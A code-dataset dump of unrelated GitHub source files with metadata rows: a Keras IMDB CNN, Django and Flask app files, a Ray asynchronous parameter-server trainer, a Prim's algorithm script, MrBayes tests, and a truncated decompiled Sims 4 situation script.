            print("数据库连接失败... 请检查连接配置和数据库服务器配置")
            print(err)
print(err)
if __name__ == "__main__":
    # Print the configured MySQL connection details, then offer to test them.
    print('数据库地址 : %s ' % get_arg('url'))
    print('数据库连接端口 %d' % get_arg('port'))
    for index in get_arg('dbs').keys():
        print('连接的数据库 %s 名称为 : %s' % (index, get_arg('dbs')[index]))
    raw=input("是否测试数据库连接? [Y/N]\t")
    if raw == "Y" or raw == "y":
        test_db()
    else:
        pass
| [
"305958872@qq.com"
] | 305958872@qq.com |
a4bc6700762042ba729d57d355527709795f6f6f | a19068d77efe49808ea54a2cdb1f64036248fbee | /experiments/CNN_BasicExpmnt.py | 61e841bdc706f2ff930a4c5325f94355a6b8fb27 | [] | no_license | sarneetk/NLP-Project | 6facb81a9307684f90c237192fcc824534dbfff5 | e5c483a763d5818365f8280292ac586638ba10ee | refs/heads/master | 2023-03-25T21:04:20.632517 | 2021-03-21T04:19:01 | 2021-03-21T04:19:01 | 344,712,064 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,309 | py | # CNN for the IMDB problem
from tensorflow import keras
from keras.datasets import imdb
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Flatten
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras import backend as K
import matplotlib.pyplot as plt
plt.style.use('ggplot')
def plot_graph(history):
    """Plot training/validation accuracy and loss curves side by side."""
    hist = history.history
    epochs = range(1, len(hist['accuracy']) + 1)
    plt.figure(figsize=(12, 5))
    # Left panel: accuracy curves.
    plt.subplot(1, 2, 1)
    plt.plot(epochs, hist['accuracy'], 'b', label='Training acc')
    plt.plot(epochs, hist['val_accuracy'], 'r', label='Validation acc')
    plt.title('Training and validation accuracy')
    plt.legend()
    # Right panel: loss curves.
    plt.subplot(1, 2, 2)
    plt.plot(epochs, hist['loss'], 'b', label='Training loss')
    plt.plot(epochs, hist['val_loss'], 'r', label='Validation loss')
    plt.title('Training and validation loss')
    plt.legend()
    plt.show()
def recall(y_true, y_pred):
    """Recall-style metric built from Keras backend ops.

    NOTE(review): y_true is overwritten with an all-ones tensor below, so
    every element is treated as a positive — this computes the mean rounded
    prediction rate rather than true recall. Confirm this is intentional.
    """
    y_true = K.ones_like(y_true)
    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    all_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
    # NOTE(review): 'true_positives != 0' compares a backend tensor, not a
    # Python number; its truthiness depends on backend/eager mode — verify.
    if (true_positives!=0):
        recall0 = true_positives / (all_positives + K.epsilon())
    else:
        recall0=0.0
    return recall0
def precision(y_true, y_pred):
    """Precision-style metric built from Keras backend ops.

    NOTE(review): y_true is overwritten with an all-ones tensor below, so the
    numerator counts all rounded positive predictions — this is not standard
    precision. Confirm this is intentional (mirrors recall() above).
    """
    y_true = K.ones_like(y_true)
    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
    # NOTE(review): 'true_positives != 0' compares a backend tensor, not a
    # Python number; its truthiness depends on backend/eager mode — verify.
    if(true_positives!=0):
        precision0 = true_positives / (predicted_positives + K.epsilon())
    else:
        precision0=0.0
    return precision0
def f1_score(y_true, y_pred):
    """Harmonic mean of the precision() and recall() metrics defined above."""
    p = precision(y_true, y_pred)
    r = recall(y_true, y_pred)
    return 2 * ((p * r) / (p + r + K.epsilon()))
if __name__ == '__main__':
    # load the dataset but only keep the top 5000 words, zero the rest
    top_words = 5000
    (X_train, y_train), (X_test, y_test) = imdb.load_data(num_words=top_words)
    # pad dataset to a maximum review length in words
    max_words = 500
    X_train = sequence.pad_sequences(X_train, maxlen=max_words)
    X_test = sequence.pad_sequences(X_test, maxlen=max_words)
    # Define CNN Model
    # first layer is the Embedded layer that uses 32 length vectors to represent each word.
    # The next layer is the one dimensional CNN layer .
    # Finally, because this is a classification problem we use a Dense output layer with a single neuron and
    # a sigmoid activation function to make 0 or 1 predictions for the two classes (good and bad) in the problem.
    embedding_vector_length = 32
    model = Sequential()
    model.add(Embedding(top_words, embedding_vector_length, input_length=max_words))
    model.add(Conv1D(32, 3, padding='same', activation='relu'))
    model.add(MaxPooling1D())
    model.add(Flatten())
    model.add(Dense(250, activation='relu'))
    model.add(Dense(1, activation='sigmoid'))
    # Track the custom metrics defined above alongside accuracy.
    model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy',f1_score, precision, recall])
    model.summary()
    # Fit the model
    history=model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3, batch_size=128, verbose=2)
    # Evaluation of the model with training data
    scores_train = model.evaluate(X_train, y_train, verbose=0)
    print("Training Data: ")
    print("Accuracy: %.2f%%, F_1Score: %.2f%% , Precision: %.2f%%, Recall: %.2f%% " % (scores_train[1]*100,scores_train[2]*100,
                                                                       scores_train[3]*100,scores_train[4]*100))
    # Evaluation of the model with test data
    scores = model.evaluate(X_test, y_test, verbose=0)
    print("Test Data:")
    print("Accuracy: %.2f%%, F_1Score: %.2f%% , Precision: %.2f%%, Recall: %.2f%%" % (scores[1] * 100,scores[2] * 100 ,
                                                                      scores[3] * 100,scores[4] * 100))
    # Plotting the graph
    plot_graph(history)
"noreply@github.com"
] | noreply@github.com |
8de417f20989172bfac0cbb257285314d44a4cb5 | 09d81c119fb88b73c0968e6d384898ec1a65bb36 | /lab5/lab5/settings.py | 7990e2f20bbb476fd206cc294ebb34cc91767911 | [] | no_license | n10florin/nfir1917 | 8a92f5c3c32aecdaf56114ed205edbefa8f66902 | 11aca585d9b4d3bd17cd7fe8136967c2effe4c68 | refs/heads/master | 2021-04-12T09:54:08.639211 | 2018-05-17T11:28:46 | 2018-05-17T11:28:46 | 126,162,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,154 | py | """
Django settings for lab5 project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r3()ve1_7+x%9)(t5(%q19!=fqs9e3s$+0h#9d+$=^y2wtg-6$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'note.apps.NoteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lab5.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lab5.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"n10florin@gmail.com"
] | n10florin@gmail.com |
5cb33ac9f43d4cdcb1e19f70d4624b4fa4b74cb0 | 6a7cf44a3cdce674bd0659f81f830826caac34e1 | /Lessons/lol.py | 0c454d9399717a381f486f94fb7b1c9387163d25 | [] | no_license | Ethansu/Random-Python | 9f1b6198968091cd3f356ad2962d0efdc455c76a | 4b1b18e1cb6c04f1195082c5d0899f476e234a55 | refs/heads/master | 2021-05-06T02:10:18.163866 | 2017-12-17T00:53:14 | 2017-12-17T00:53:14 | 114,498,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | #import unittest
#from homework_6 import Car
def lol(x):
    """Return (x + 1) / 4 as a float."""
    shifted = x + 1
    return shifted / 4
"jingchunsumacc@gmail.com"
] | jingchunsumacc@gmail.com |
01963dfede8f5f05b7ffa0c3d4400f87db8be7ca | eae1829b4a629571a9e3821760cf6c7e2547b300 | /cifar_asgd_new.py | dfb193cce4191c71d4b11ca0ad712fe51cb6f42a | [] | no_license | zdpau/Sync-Async_PS | 1b3131a3a7d135bb3d62896ca3dd74ba6d18aa30 | 86a1c71960b70d86cad9c6f97a8a3932a1cb79ff | refs/heads/master | 2021-07-21T10:16:34.547532 | 2018-12-19T09:29:39 | 2018-12-19T09:29:39 | 140,381,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,144 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import ray
import tensorflow as tf
import cifar10
import cifar10_train
import time
from collections import deque
import random
import sys
numLoops = 5000
FLAGS = tf.app.flags.FLAGS
# tf.app.flags.DEFINE_string('param_name', 'default_val, 'description')
tf.app.flags.DEFINE_string('train_dir', 'cifar10_train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Number of batches to run.""")
tf.app.flags.DEFINE_integer('log_frequency', 10,
"""How often to log results to the console.""")
tf.app.flags.DEFINE_integer('num_examples', 10000,
"""Number of examples to run.""")
tf.app.flags.DEFINE_integer('num_nodes', 1,
"""Number of nodes.""")
tf.app.flags.DEFINE_float('delay', 0, """delay""")
tf.app.flags.DEFINE_boolean('sync', False, """synchronous mode""")
tf.app.flags.DEFINE_boolean('serial', False, """serial mode""")
def t():
    """Shorthand for the current wall-clock time in seconds."""
    now = time.time()
    return now
@ray.remote
class ParameterServer(object):
    """Central parameter store for asynchronous SGD (a Ray actor).

    Gradients arrive via push() stamped with their arrival time and are
    buffered; pull() applies every buffered gradient older than FLAGS.delay
    seconds before returning the current weights, simulating staleness.
    """
    def __init__(self, keys, values, num_nodes):
        # FIFO of (arrival_time, keys, gradient_values) tuples.
        self.grad_buf = deque()
        # Copy so the server owns its weight arrays.
        values = [value.copy() for value in values]
        self.weights = dict(zip(keys, values))
        self.num_nodes = num_nodes
    def push(self, keys, values):
        """Buffer a gradient update together with its arrival timestamp."""
        # print (a)
        timeline = (t(), keys, values)
        #print(timeline)
        self.grad_buf.append(timeline)
        # print (grad_buf)
    def update(self, keys, values):
        """Apply one gradient, scaled by 1/num_nodes, to the stored weights."""
        for key, value in zip(keys, values):
            self.weights[key] += value / self.num_nodes
    def pull(self, keys):
        """Drain all sufficiently old buffered gradients, then return weights."""
        tau0 = t()
        while len(self.grad_buf) > 0:
            # Only apply gradients queued for longer than the simulated
            # delay; newer ones stay buffered until a later pull.
            if self.grad_buf[0][0] < tau0 - FLAGS.delay:
                entry = self.grad_buf.popleft()
                self.update(entry[1], entry[2])
            else:
                break
        return [self.weights[key] for key in keys]
@ray.remote
class Worker(object):
    """Training actor: one per cluster node.

    Repeatedly pulls weights from the parameter server, computes gradients
    on a single (image, label) example, and pushes them back.
    """
    def __init__(self, ps, num, zero):
        self.net = cifar10_train.Train()
        self.keys = self.net.get_weights()[0]
        self.zero = zero     # experiment start time, for log timestamps
        self.num = num       # worker index, used in log lines
        self.ps = ps         # handle to the ParameterServer actor
        self.counter = 0     # number of gradient steps taken so far
        # Visit the training examples in a fixed random order per worker.
        self.indexes = list(range(len(self.net.images)))
        random.shuffle(self.indexes)
        weights = ray.get(self.ps.pull.remote(self.keys))
        self.net.set_weights(self.keys, weights)
        self.addr = ray.services.get_node_ip_address()
    def execOne(self, c):
        """Compute gradients for the c-th (wrapping) shuffled example."""
        index = self.indexes[c % len(self.net.images)]
        im = self.net.images[index]
        lb = self.net.labels[index]
        gradients = self.net.compute_update(im,lb)
        print ("LOSS {} {} {:.6f} {}".format(self.num, c, time.time() - self.zero, self.net.lossval))
        sys.stdout.flush()
        return gradients
    def computeOneCycle(self):
        """One asynchronous SGD step: pull weights, compute, push gradients."""
        weights = ray.get(self.ps.pull.remote(self.keys))
        self.net.set_weights(self.keys, weights)
        gradients = self.execOne(self.counter)
        self.counter += 1
        self.ps.push.remote(self.keys, gradients)
        return 1 # dummy to sync
    def go(self, times, independent=False):
        """Run `times` steps; independent=True skips the parameter server."""
        for c in range(times):
            if independent:
                self.execOne(c)
            else:
                self.computeOneCycle()
        return 1
    def get_addr(self):
        """IP address of the node this actor is placed on."""
        return self.addr
def createWorkers(num_workers, ps, zero):
    ''' create one worker per one node '''
    # Keep spawning actors until one worker exists on each distinct host;
    # actors that land on an already-used host are simply abandoned.
    # NOTE(review): if the cluster has fewer distinct hosts than
    # num_workers, this loop never terminates -- confirm intended.
    hosts = []
    workers = []
    counter = 0
    while counter < num_workers:
        worker = Worker.remote(ps, counter, zero)
        addr = ray.get(worker.get_addr.remote())
        if addr in hosts:
            ''' throw away worker '''
            continue
        workers.append(worker)
        hosts.append(addr)
        counter += 1
    return workers
def main(argv=None):
    """Entry point: reset the train dir, build the PS and workers, run the chosen mode."""
    # tf.app.flags.FLAGS._parse_flags(sys.argv)
    # cifar10.maybe_download_and_extract()
    if tf.gfile.Exists(FLAGS.train_dir):
        tf.gfile.DeleteRecursively(FLAGS.train_dir)
    tf.gfile.MakeDirs(FLAGS.train_dir)
    ray.init(num_gpus=2)
    # A throwaway local model supplies the initial weights for the server.
    net = cifar10_train.Train()
    all_keys, all_values = net.get_weights()
    ps = ParameterServer.remote(all_keys, all_values, FLAGS.num_nodes)
    zero = time.time()
    # workers = [Worker.remote(ps, n, zero) for n in range(FLAGS.num_nodes)]
    workers = createWorkers(FLAGS.num_nodes, ps, zero)
    global numLoops
    # Split the total iteration budget evenly across nodes.
    numLoops = (int)(numLoops / FLAGS.num_nodes)
    if FLAGS.sync:
        # Lock-step: every worker completes a cycle before the next begins.
        print("SYNC mode")
        for _ in range(numLoops):
            ray.get([w.computeOneCycle.remote() for w in workers])
    elif FLAGS.serial:
        # Single worker, no parameter-server round-trips.
        print("SERIAL mode")
        _ = ray.get(workers[0].go.remote(numLoops, independent=True))
    else:
        # Fully asynchronous: workers push/pull at their own pace.
        print("ASYNC mode")
        _ = ray.get([w.go.remote(numLoops, independent=False) for w in workers])


if __name__ == '__main__':
    tf.app.run()
| [
"noreply@github.com"
] | noreply@github.com |
c0c5bf3b9e293f9e815bdb6e73677906bd3d0e31 | fad2c9d62fbc48230af447c980e641626c86c1d5 | /users/apps.py | 1231bc80c02815a3287789710efca12d72d86056 | [] | no_license | marcoapr/django-lab | 65a50d9736d52fddcf84cdf47c3b84f918e5b1d7 | 35856afa988ac619643919b50a11d8de2bfba856 | refs/heads/master | 2020-04-02T20:06:57.508267 | 2018-10-26T01:22:54 | 2018-10-26T01:22:54 | 154,758,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | """ User app configuration. """
from django.apps import AppConfig
class UsersConfig(AppConfig):
    """Application configuration for the ``users`` Django app."""

    verbose_name = 'Users'
    name = 'users'
| [
"mperez@unitedvirtualities.com"
] | mperez@unitedvirtualities.com |
2354d06939d6c72e5399a441a3e3c362fe7451e0 | 65e2f1f1daaaf175b09d0863f6ed77c77129fed6 | /c/personal/algo_007/programming_assignments/algo_002/1/prim/prim_bkp.py | a4a4efd5fb5b32000cb176f21d8e90f7d077059b | [] | no_license | ausanyal/code | 86b010613eb5b9dc0ada717e0db8e21f4ede8961 | a359f9cfb650d57ce88c39dc0e15dce19a5324bd | refs/heads/master | 2021-01-01T15:39:34.985446 | 2018-05-07T01:47:02 | 2018-05-07T01:47:02 | 97,669,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,539 | py | #!/usr/bin/python
import sys
import collections
from decimal import Decimal
# Read the graph: first line is "<num_vertices> <num_edges>", each further
# line is "<u> <v> <edge_cost>".
f = open('input', 'r')
lines = f.readlines()
nv = 0
ne = 0
d = {}  # adjacency: d[u]['ud'][cost] -> list of neighbours v reachable at that cost
for line in lines:
    if ne == 0:
        # NOTE(review): nv and ne remain *strings* after split(); the later
        # `count < nv` comparison relies on Python 2 mixed-type ordering --
        # confirm this script targets Python 2 (the print statements suggest so).
        nv,ne = line.split(' ')
    else:
        u,v,e = map(int, line.split(' '))
        if u not in d.keys():
            d[u] = {}
            d[u]['ud'] = {}
        if e not in d[u]['ud'].keys():
            d[u]['ud'][e] = []
        d[u]['ud'][e].append(v)
        # 'od' mirrors the unordered adjacency, sorted by increasing edge cost.
        d[u]['od'] = collections.OrderedDict(sorted(d[u]['ud'].items()))
def find_smallest_cut(pd):
    """Return (u, v, cost) for the cheapest edge crossing out of the tree `pd`.

    Side effect: prunes from the global adjacency `d` any edge whose endpoint
    is already inside `pd`.  Python 2 only: relies on print statements and on
    dict.keys() returning a list so deletion during iteration is safe.
    """
    le_key = Decimal('Infinity')
    ct = 0
    # we need to explore a new edge per iter
    # v cannot point to an existing vertex already explored
    for u in pd.keys():
        if u == 500:
            continue
        if u not in d.keys():
            #print "u: ", 6, "not in keys"
            continue
        for e in d[u]['od'].keys():
            for v in d[u]['od'][e]:
                if v in pd.keys():
                    #print "v", v, "for u", u, "in pd.keys", pd.keys()
                    del d[u]['od'][e]
                    ct = ct + 1
    # Second pass: pick the tree vertex whose cheapest remaining edge is minimal.
    le_u = None
    for u in pd.keys():
        if u == 500:
            continue
        if u not in d.keys():
            #print "u: ", 6, "not in keys"
            continue
        if len(d[u]['od'].keys()) > 0:
            #print "1. u: ", u, "pd.keys: ", pd.keys(), "d[u]['od'].keys()[0] : ", d[u]['od'].keys()[0]
            if d[u]['od'].keys()[0] < le_key:
                le_u = u
                le_key = d[le_u]['od'].keys()[0]
    if le_u is not None:
        # First neighbour reachable at the minimal cost from the chosen vertex.
        v = d[le_u]['od'][le_key][0]
        #print "3. ", le_key, "u: ", le_u, "v: ", v
        return le_u, v, le_key
    else:
        print "(((((((((((((((((((((((((( ERROR ))))))))))))))))))))))))))", ct
        return 0, 0, 0
# Prim's algorithm driver: grow the tree from vertex 1, repeatedly attaching
# the cheapest crossing edge until all vertices are included.
i = 1
count = 0
w = 0  # running total weight of the spanning tree
pd = {}  # tree membership: vertex -> [neighbour, edge_cost] that attached it
# add i to pd
#print "************* Adding ", i, "to pd ", pd.keys()
pd[i] = []
while (count < nv):
    # NOTE(review): `nv` is still a string here; under Python 2 an int < str
    # comparison is always True, so only the len(pd) check below terminates.
    u, v, le_key = find_smallest_cut(pd)
    pd[u] = [ v, le_key ]
    if v not in pd.keys() and (v != 0):
        # add v to pd
        pd[v] = []
    w = w + le_key
    print "************* Adding ", u, "-", v, "to pd ", pd.keys(), "e: ", le_key, "w: ", w
    #del d[u]['od'][le_key]
    count = count + 1
    #print "7: ", u, v, le_key, " pd.keys: ", pd.keys(), "count: ", count, "w: ", w, "len: ", len(pd.keys())
    if len(pd.keys()) == int(nv):
        print "Done"
        break
'''
def find_smallest_cut(pd):
le_key = Decimal('Infinity')
for u in pd.keys():
print "1. u: ", u, "pd.keys: ", pd.keys()
#print "2. ", d[u]
if d[u]['od'].keys()[0] < le_key:
le_u = u
le_key = d[le_u]['od'].keys()[0]
# for this le get first v from the list of (u, v1) or (u, v2) ...
v = d[le_u]['od'][le_key][0]
# we need to explore a new edge per iter
# v cannot point to an existing vertex already explored
if v in pd.keys():
print "2: v: ", v, "is in pd.keys"
del d[le_u]['od'][le_key]
print "3: remaining in le_u: ", le_u, "keys: ", d[le_u]['od']
le_key = Decimal('Infinity')
if d[u]['od'].keys()[0] is not None:
le_key = d[le_u]['od'].keys()[0]
continue
#print "3. ", le_key
#print "4. ", le_key, le_u
#print "5. ", d[le_u]
v = d[le_u]['od'][le_key][0]
#print "6. ", le_u, v, le_key
return le_u, v, le_key
'''
| [
"aubin.sanyal@gmail.com"
] | aubin.sanyal@gmail.com |
feb3861b0c0a06a508fdf4a0748c05fe0b8f72be | 0f00c8a02e8dc1d8136b2afc92338108f92cc6ae | /recipes/mrbayes/run_test.py | 40033ea2ed9721ad50dfc69b067eccb43cef93ff | [] | no_license | faircloth-lab/conda-recipes | 3714f5be83753261bf3abc70454bdf6b7028c8d6 | 75a520a75a357ea47ee80262f3c3a6dfe1b0715f | refs/heads/master | 2021-01-20T07:07:05.705307 | 2015-06-16T13:50:18 | 2015-06-16T13:50:18 | 12,671,015 | 2 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
(c) 2013 Brant Faircloth || http://faircloth-lab.org/
All rights reserved.
This code is distributed under a 3-clause BSD license. Please see
LICENSE.txt for more information.
Created on 30 December 2013 16:33 PST (-0800)
"""
import unittest
import subprocess
class TestMb(unittest.TestCase):
    """Smoke-test the serial MrBayes binary via its help banner."""

    def test_mb(self):
        proc = subprocess.Popen(["mb", "-h"],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        self.stdout, self.stderr = proc.communicate()
        # Inspect every other line (0, 2, 4) of the banner.
        banner_lines = self.stdout.split("\n")
        text = [line.strip()
                for idx, line in enumerate(banner_lines)
                if idx in (0, 2, 4)]
        assert text == ['',
                        'MrBayes v3.2.2 x64',
                        '(Bayesian Analysis of Phylogeny)']
class TestMbMpi(unittest.TestCase):
    """Smoke-test the MPI-enabled MrBayes binary via its help banner."""

    def test_mb(self):
        proc = subprocess.Popen(["mb-mpi", "-h"],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        self.stdout, self.stderr = proc.communicate()
        # Inspect every other line (0, 2, 4) of the banner.
        banner_lines = self.stdout.split("\n")
        text = [line.strip()
                for idx, line in enumerate(banner_lines)
                if idx in (0, 2, 4)]
        assert text == ['MrBayes v3.2.2 x64',
                        '(Bayesian Analysis of Phylogeny)',
                        '(Parallel version)']


if __name__ == '__main__':
    unittest.main()
| [
"brant@faircloth-lab.org"
] | brant@faircloth-lab.org |
e134d1f0bece4a5e209fd10eaedcb6493c8f17b2 | e67b0c01d7244f1c635d7c2e12157076bcd2efbc | /finalproject/app.py | c4341f5d265bdc737da29944cf08361513cc42c2 | [] | no_license | SonjaGrusche/LPTHW | 0a7de74101db1b0ae62ffc35d4fac990c894ae14 | 12483e97373c9e0aa9e8785b20bb34e1e5b4b36a | refs/heads/master | 2021-01-12T15:52:06.404665 | 2017-03-21T10:27:53 | 2017-03-21T10:27:53 | 71,830,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,293 | py | from flask import Flask, session, request
from flask import url_for, redirect, render_template
from random import randint
import resources
app = Flask(__name__)
@app.route('/', methods=['GET'])
def start_get():
    """Render the landing page."""
    page = render_template('start.html')
    return page
@app.route('/questionnaire', methods=['GET'])
def questionnaire_get():
    """Show the questionnaire form with all questions."""
    return render_template(
        'questionnaire.html',
        questions=resources.questions,
    )
@app.route('/questionnaire', methods=['POST'])
def questionnaire_post():
    """Score the submitted answers and redirect to the result page.

    A missing answer makes ``request.form.get`` return None, whose int()
    conversion raises TypeError; in that case the form is re-shown with
    an error flag.
    """
    score = 0
    for number in range(1, 11):
        answer = request.form.get('question' + str(number))
        try:
            score += int(answer)
        except TypeError:
            return render_template('questionnaire.html',
                                   questions=resources.questions, error=1)
    return redirect(url_for('result', total=score + 20))
@app.route('/result/<int:total>')
def result(total):
    """Map the questionnaire score to a category and show a matching link.

    Fixes two defects in the original: the category variable shadowed the
    builtin ``type``, and any score of 33 or more (possible, since
    individual answers are not range-checked) fell through every branch
    and raised UnboundLocalError.  Out-of-range scores are now clamped
    into the last category.
    """
    if total < 10:
        category = 0
    elif total < 20:
        category = 1
    elif total < 26:
        category = 2
    elif total < 30:
        category = 3
    else:
        # Covers 30-32 as before, plus clamps any higher score.
        category = 4
    sites = resources.links[category]
    website = sites[randint(0, len(sites) - 1)]
    return render_template('results.html', site=website)
# NOTE(review): hard-coded session secret; load it from an environment
# variable before deploying anywhere real.
app.secret_key = '1234supersecret'
if __name__ == "__main__":
    app.run()
| [
"sonja.grusche@stud.leuphana.de"
] | sonja.grusche@stud.leuphana.de |
4fafdb60d2714fc699c55d2ce9bc473bfcffb686 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /Scripts/simulation/situations/complex/university_mixer_situation.py | bdd94a7c82a8c319385d8ae99bf8517a96e6a57b | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,087 | py | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\situations\complex\university_mixer_situation.py
# Compiled at: 2019-10-19 01:32:53
# Size of source mod 2**32: 5699 bytes
from situations.situation_complex import SituationComplex, CommonInteractionCompletedSituationState, CommonSituationState, SituationComplexCommon, TunableSituationJobAndRoleState, SituationStateData
from sims4.tuning.tunable import TunableReference, TunableEnumWithFilter
from tag import Tag
import services
from objects.object_manager import ObjectManager
from sims4.tuning.instances import lock_instance_tunables
from situations.bouncer.bouncer_request import exclusivity_compare
from situations.bouncer.bouncer_types import BouncerExclusivityCategory
from situations.situation_types import SituationCreationUIOption
from situations.situation import Situation
class _MixerParty(CommonSituationState):
    # State representing the party itself; ends when its situation timer expires.

    def timer_expired(self):
        # Party time is up: move on to tearing down the juice keg.
        self._change_state(self.owner.cleanup_party_state())

    def on_activate(self, reader=None):
        super().on_activate(reader)
        # Claim the keg so it stays reserved for this situation during the party.
        if self.owner.juice_keg is not None:
            self.owner._claim_object(self.owner.juice_keg.id)
class _CleanupJuiceKeg(CommonInteractionCompletedSituationState):
    # Final state: wait for the keg-cleanup interaction, then end the situation.

    def on_activate(self, reader=None):
        super().on_activate(reader)
        # No keg to clean up -- end immediately.
        if self.owner.juice_keg is None:
            self.owner._self_destruct()

    def _on_interaction_of_interest_complete(self, **kwargs):
        # Keg has been cleaned up; the situation is over.
        self.owner._self_destruct()
class _SetupJuiceKeg(CommonInteractionCompletedSituationState):
    # Initial state: once the keg-setup interaction completes, start the party.

    def _on_interaction_of_interest_complete(self, **kwargs):
        self._change_state(self.owner.mixer_party_state())
class UniversityMixerPartySituation(SituationComplexCommon):
INSTANCE_TUNABLES = {'juice_keg_bearer_job_and_role':TunableSituationJobAndRoleState(description='\n The job and role state for the bearer of the juice keg.\n '),
'setup_juice_keg_state':_SetupJuiceKeg.TunableFactory(description='\n The state to bring in the keg bearer and have the juice keg set up on the lot.\n ',
display_name='1. Setup Juice Keg State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'mixer_party_state':_MixerParty.TunableFactory(description='\n The state to represent the party itself.\n ',
display_name='2. Mixer Party State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'cleanup_party_state':_CleanupJuiceKeg.TunableFactory(description='\n The state to cleanup the juice keg and end the party\n ',
display_name='3. Party Cleanup State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'juice_keg_tag':TunableEnumWithFilter(description='\n Tag used to find the juice keg supplied by the situation.\n ',
tunable_type=Tag,
default=Tag.INVALID,
invalid_enums=Tag.INVALID,
filter_prefixes=('func', ))}
REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES
    def __init__(self, *args, **kwargs):
        (super().__init__)(*args, **kwargs)
        # Cached object id of the keg; resolved lazily by the juice_keg property.
        self._juice_keg_object_id = None
    def start_situation(self):
        """Begin in the keg-setup state, claiming the keg if it already exists."""
        super().start_situation()
        if self.juice_keg is not None:
            self._claim_object(self.juice_keg.id)
        self._change_state(self.setup_juice_keg_state())
    @classmethod
    def _states(cls):
        # Declares the three-state flow: setup keg -> party -> cleanup.
        return (SituationStateData(1, _SetupJuiceKeg, factory=(cls.setup_juice_keg_state)),
                SituationStateData(2, _MixerParty, factory=(cls.mixer_party_state)),
                SituationStateData(3, _CleanupJuiceKeg, factory=(cls.cleanup_party_state)))
    @classmethod
    def _get_tuned_job_and_default_role_state_tuples(cls):
        # The keg bearer is the only tuned job for this situation.
        return [(cls.juice_keg_bearer_job_and_role.job, cls.juice_keg_bearer_job_and_role.role_state)]
    @classmethod
    def default_job(cls):
